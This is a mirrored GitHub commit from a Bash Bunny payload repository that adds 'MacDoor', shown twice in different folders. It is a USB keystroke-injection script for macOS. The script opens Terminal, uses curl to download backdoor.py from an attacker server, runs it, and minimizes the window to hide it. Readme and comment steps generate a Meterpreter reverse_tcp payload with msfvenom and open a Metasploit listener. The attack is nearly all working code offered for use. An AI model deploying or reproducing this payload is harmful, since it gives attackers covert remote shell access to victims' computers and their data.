mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Create MacDoor - A Python Backdoor for MacOS (#662)
* Add files via upload * Update readme.md * Add files via upload * Update readme.md * Update payload.txt
This commit is contained in:
47
payloads/library/execution/MacDoor/payload.txt
Normal file
47
payloads/library/execution/MacDoor/payload.txt
Normal file
@@ -0,0 +1,47 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: MacDoor
|
||||||
|
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||||
|
# Author: afsh4ck
|
||||||
|
# Version: 1.0
|
||||||
|
# Target: MacOS
|
||||||
|
# Category: Execution
|
||||||
|
#
|
||||||
|
# Steps:
|
||||||
|
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||||
|
# Step 2: mount a local server 'python3 -m http.server'
|
||||||
|
# Step 3: msfconsole multi/handler listener open before the attack.
|
||||||
|
#
|
||||||
|
# Note:
|
||||||
|
# You need to modify the script with your attacker IP and the port or your local server.
|
||||||
|
#
|
||||||
|
# Purple.............Setup
|
||||||
|
# Yellow blink.......Attack Mode ON
|
||||||
|
# Green..............Finish
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
# Open terminal
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Terminal
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 3000
|
||||||
|
|
||||||
|
# Execute attack
|
||||||
|
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING cd Downloads
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING python3 backdoor.py
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
# Minimize terminal
|
||||||
|
QUACK GUI m
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
# Standby
|
||||||
|
LED FINISH
|
||||||
30
payloads/library/execution/MacDoor/readme.md
Normal file
30
payloads/library/execution/MacDoor/readme.md
Normal file
@@ -0,0 +1,30 @@
|
|||||||
|
# MacDoor - Python Backdoor Execution for the BashBunny
|
||||||
|
|
||||||
|
```
|
||||||
|
__ ___ ____
|
||||||
|
/ |/ /____ _ _____ / __ \ ____ ____ _____
|
||||||
|
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
|
||||||
|
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
|
||||||
|
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
|
||||||
|
```
|
||||||
|
|
||||||
|
* Author: afsh4ck
|
||||||
|
* Version: 1.0
|
||||||
|
* Target: MacOS
|
||||||
|
* Tested on: Ventura 13.3.1
|
||||||
|
* Category: Execution
|
||||||
|
|
||||||
|
# DESCRIPTION
|
||||||
|
|
||||||
|
Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||||
|
|
||||||
|
# STEPS
|
||||||
|
|
||||||
|
* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||||
|
* Step 2: mount a local server 'python3 -m http.server'
|
||||||
|
* Step 3: msfconsole multi/handler listener open before the attack.
|
||||||
|
|
||||||
|
# NOTE
|
||||||
|
|
||||||
|
* You need to modify the script with your attacker IP and the port or your local server.
|
||||||
|
|
||||||
47
payloads/library/remote_access/MacDoor/payload.txt
Normal file
47
payloads/library/remote_access/MacDoor/payload.txt
Normal file
@@ -0,0 +1,47 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: MacDoor
|
||||||
|
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||||
|
# Author: afsh4ck
|
||||||
|
# Version: 1.0
|
||||||
|
# Target: MacOS
|
||||||
|
# Category: Remote Access
|
||||||
|
#
|
||||||
|
# Steps:
|
||||||
|
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||||
|
# Step 2: mount a local server 'python3 -m http.server'
|
||||||
|
# Step 3: msfconsole multi/handler listener open before the attack.
|
||||||
|
#
|
||||||
|
# Note:
|
||||||
|
# You need to modify the script with your attacker IP and the port or your local server.
|
||||||
|
#
|
||||||
|
# Purple.............Setup
|
||||||
|
# Yellow blink.......Attack Mode ON
|
||||||
|
# Green..............Finish
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
# Open terminal
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Terminal
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 3000
|
||||||
|
|
||||||
|
# Execute attack
|
||||||
|
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING cd Downloads
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING python3 backdoor.py
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
# Minimize terminal
|
||||||
|
QUACK GUI m
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
# Standby
|
||||||
|
LED FINISH
|
||||||
30
payloads/library/remote_access/MacDoor/readme.md
Normal file
30
payloads/library/remote_access/MacDoor/readme.md
Normal file
@@ -0,0 +1,30 @@
|
|||||||
|
# MacDoor - Python Backdoor Execution for MacOS
|
||||||
|
|
||||||
|
```
|
||||||
|
__ ___ ____
|
||||||
|
/ |/ /____ _ _____ / __ \ ____ ____ _____
|
||||||
|
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
|
||||||
|
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
|
||||||
|
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
|
||||||
|
```
|
||||||
|
|
||||||
|
* Author: afsh4ck
|
||||||
|
* Version: 1.0
|
||||||
|
* Target: MacOS
|
||||||
|
* Tested on: Ventura 13.3.1
|
||||||
|
* Category: Remote Access
|
||||||
|
|
||||||
|
# DESCRIPTION
|
||||||
|
|
||||||
|
Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
|
||||||
|
|
||||||
|
# STEPS
|
||||||
|
|
||||||
|
* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
|
||||||
|
* Step 2: mount a local server 'python3 -m http.server'
|
||||||
|
* Step 3: msfconsole multi/handler listener open before the attack.
|
||||||
|
|
||||||
|
# NOTE
|
||||||
|
|
||||||
|
* You need to modify the script with your attacker IP and the port or your local server.
|
||||||
|
|
||||||
Reference in New Issue
Block a user